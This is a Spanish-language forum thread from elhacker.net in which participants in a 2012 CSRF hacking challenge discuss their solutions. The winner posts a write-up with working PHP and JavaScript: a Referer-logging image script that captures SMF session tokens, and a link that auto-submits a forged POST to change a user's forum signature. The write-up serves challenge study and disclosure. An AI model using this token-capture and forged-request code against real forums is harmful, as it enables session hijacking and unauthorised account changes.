[Finalizado] Hackea a elhacker.net v2.0 (ganador: yoya)

Iniciado por WHK, 3 Febrero 2012, 14:12 PM

0 Miembros y 2 Visitantes están viendo este tema.

p0is0n-123

Yo me fuí a la *****, nosé para que hice el vídeo  ;)
Felicidades igualmente.
Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
http://www.seginformatica.net

WHK

Hombre, que te faltó muy poco pero asi no era, en ese caso hubieras usado ingenieria social para descargar el html con codigo malicioso que solo se ejecuta en ie de forma local y hubieras extraido contraseñas de manera mas fácil.

Muy diferente a hacer click en un enlace y que se te cambie la firma de una, además yoya encontró el bug del token primero que tu, recuerda que habia que explotar el bug.

Mas adelante podriamos hacer otro reto con una inyección sql que anda por ahi jajajajaja :P,.. ahh no, ese es privado xD sorry :P

p0is0n-123

Como dije, si mi vídeo no se daba por válido estaba poniendo en bandeja como solucionar el reto.
No le quito merito a Yoya, ni mucho menos.

Aun así por lo menos me da para contar en mi blog como lo he resuelto...
Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
http://www.seginformatica.net

~ Yoya ~

#133
Cita de: p0is0n-123 en 16 Febrero 2012, 22:05 PM
Como dije, si mi vídeo no se daba por válido estaba poniendo en bandeja como solucionar el reto.

Tu método es muy difícil que funcione, ya que muchos datos tienes que ingresarlo manualmente y al tener varios tokens no sabrías correctamente quien es de quien. Y el plan era que el CSRF sea muy efectivo, así que tendrías que hacerte de algún método para que sea muy efectivo. Y al tener que descargar un archivo, pueda que el usuario lo ejecute con otro navegador o simplemente el token haya cambiado por diferentes motivos.



Bueno aquí detallo como hice todo.

Puntos importantes

  • 1 - Obtener el token de sesión del usuario


    • 1.2- El token es una sesión PHP
  • 2 - Para realizar el cambio de firma, es necesario enviar el contenido vía POST

    • 2.2 - Existe un filtro que cancela cualquier tipo de modificacion, si la petición proviene de un sitio remoto
  • 3 - Hacer un exploit que sea lo mas efectivo y automatizado posible

1
- El primer punto era obtener el token de sesion del usuario. Primero como el objetivo del reto es un CSRF, debemos comenzar a descartar un posible XSS para obtener el token. Simplemente porque si fuera necesario un XSS, el reto fuera mejor sobre XSS y no sobre CSRF.

Hace tiempo The X-C3LL publico un articulo llamado "Universal Hijacking by <img> (GET Method)", que dicho método fue utilizado para realizar una escala de privilegio en SMF 2.0. Por hay anda el exploit que publicaron The X-C3LL y Seth.

No profundo mucho en el tema, simplemente dicho método consiste en capturar el referer. El referer contiene la dirección del ultimo sitio visitado (incluyendo la ruta y todo, no simplemente el dominio).

Aquí el código que hice para capturar solo las url que contenían el id de sesión del token

index.php

Código (php) [Seleccionar]
<?php
$http 
apache_request_headers();//Contiene el contenido de la cabeseras....
//useragent, host, tipo de peticion, tipo de contenido, etc...

if(preg_match('/sesc/',$http['Referer'])) {//Se ejecuta solo si en el referer, existe la palabra sesc


$f fopen('xd.txt',"a");//Abro el archivo xd.txt, para escribir en el...
//El puntero se coloca al final del fichero

fputs($f$http['Referer']."<br>\n");//Escribo en el archivo xd.txt, la url del referer

fclose($f);//Cierro el recurso...
}

//Esta parte esta de mas, no es necesario... Solo es para generar una img xD


// Crear una imagen de 100*30
$im imagecreate(10030);

// Fondo blanco y texto azul
$fondo imagecolorallocate($im255255255);
$color_texto imagecolorallocate($im00255);

// Escribir la cadena en la parte superior izquierda
imagestring($im500'Hola mundo'$color_texto);

// Imprimir la imagen
header('Content-type: image/png');

imagepng($im);
imagedestroy($im);
?>



1.2 - Hay que tener en cuenta que el token es una sesión de PHP, por lo tanto por defecto se elimina cuando el usuario cierra el navegador o si desde php directamente se generar otra sesión.


2 - Para cambiar la firma es necesario realizar una petición POST. Y como es un CSRF tenemos que usar algún "código" que se ejecute del lado del cliente (navegador). Asi que debemos tener en cuenta que con lenguajes que se ejecuten del lado del servidor como PHP, Perl, Python, Ruby, etc... No funcionaria y la unica forma en ese caso seria primero hacer un secuestro de sesion o tener el usuario y password del usuario y simular un navegador pero eso ya no seria un CSRF.

2.2 - Existe un filtro que cancela cualquier modificación hacia el perfil del usuario, si la petición proviene de un sitio remoto. El bug esta en que si la petición no viene de ningún sitio remoto, entonce es permitible editar el perfil, en este caso la firma del usuario "pollo".

3 - Ahora pasamos a realizar el exploit que cambiaría la firma del usuario.

Como ya podemos obtener el token, ahora para que el exploit funcione es necesario realizar una petición POST que no contenga ninguna referencia.

A mi se me ocurrió la idea de ejecutar un código javascript directamente desde el navegador, el problema esta en que ahora no todo los navegadores no permiten la ejecución de javascript desde la barra de direcciones. Pero al parecer al abrir directamente una ventana emergente, puedes ejecutar un codigo javascript directamente (probado en firefox y opera, aunque en opera puedes ejecutar un código javascript directamente desde la barra de dirección).

Ahora para que el exploit sea muy efectivo, este debe ser capaz de obtener la id de sesión del usuario y luego generar un código "malicioso" capaz de editar la firma del usuario.

f.php
Código (php) [Seleccionar]
<?php


$secs 
file_get_contents('xd.txt');//Capturo el contenido del archivo xd.txt
//Este contiene el token de sesion de los usuarios

preg_match('/sesc=(\w+)<br\>$/i'$secs$result);//Capturo el ultimo token de sesion capturado

?>



<A href="javascript:document.write('<form action=\'http://foro.elhacker.net/profile2.html\' method=\'post\' accept-charset=\'ISO-8859-1\' name=\'creator\' id=\'creator\' enctype=\'multipart/form-data\'>  <input name=\'signature\' value=\'Ultra anti-0wneable! ??? - Hacked by Yoyahack!!!!!\'>  <input name=\'sc\' value=\'<?php echo $result[1]; ?>\'> <input name=\'userID\' value=\'322090\'> <input name=\'sa\' value=\'forumProfile\'><input type=\'submit\'></form><script>document.creator.submit()</script>');" target="_blank" onClick="window.open(this.href, this.target, 'width=700,height=400,location=0',true); return false;">Click aquí</A>


Con esto simplemente, el usuario debe citar, modificar algun post. Así capturaríamos el token de sesión y luego el usuario debe ir al sitio donde se encuentra alojado el archivo f.php y hacer click en "Click aquí".

Con 2 pasos simplemente bastaria y a si que es muy efectivo el exploit.

Se podría mejorar de muchas maneras, incluso es posible saber de quien es cada token de sesión jejeje. Así desconectaríamos a alguien en especifico.

Saludos.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

jdc


berz3k


p0is0n-123

Yo aunque se podría decir que he quedado segundo he hecho un post para mostrar como lo he ido desenvolviendo y resolviendo.  :P

Post - Solución al reto csrf de elhacker.net

Porfavor, si se considera spam o molesta el enlace pido que sea borrado para no causar problemas con la administración y los moderadores.

¡Un saludo! Me ha gustado bastante el reto :)
Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
http://www.seginformatica.net

WHK

#137
No hay problema :) podrias poner la url del reto en tu blog

CitarHace tiempo The X-C3LL publico un articulo llamado "Universal Hijacking by <img> (GET Method)", que dicho método fue utilizado para realizar una escala de privilegio en SMF 2.0. Por hay anda el exploit que publicaron The X-C3LL y Seth.

Recuerdo hace mucho tiempo cuando hicimos la auditoría a SMF 1.1.7 publiqué un bug de tipo CSRF que era explotable atraves de la imágen para obtener el token de sesión, de hecho este bug tiene tantos años como elhacker.net en la web usando smf.

~ Yoya ~

Cita de: WHK en 17 Febrero 2012, 15:12 PM
Recuerdo hace mucho tiempo cuando hicimos la auditoría a SMF 1.1.7 publiqué un bug de tipo CSRF que era explotable atraves de la imágen para obtener el token de sesión, de hecho este bug tiene tantos años como elhacker.net en la web usando smf.

Ese tipo de trucos, deberían crear un post para agregarlo todos. Igualmente lo que habías dicho de "Una forma de evitar el referer era via https hacia una url http ya que por politicas de seguridad de los exploradores no se envía el referer", Son muy buenos tips jejeje.


Saludos.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

jdc

Una forma de evitar que robes el sc es activar la respuesta automática en el foro u.u si el pobre pollo9 lo supiera aún estaría entre nosotros :( ese es un tip para que las futuras generaciones se protejan jajaja creo que lo hablamos con WHK hace tiempo si mal no recuerdo ñ_ñ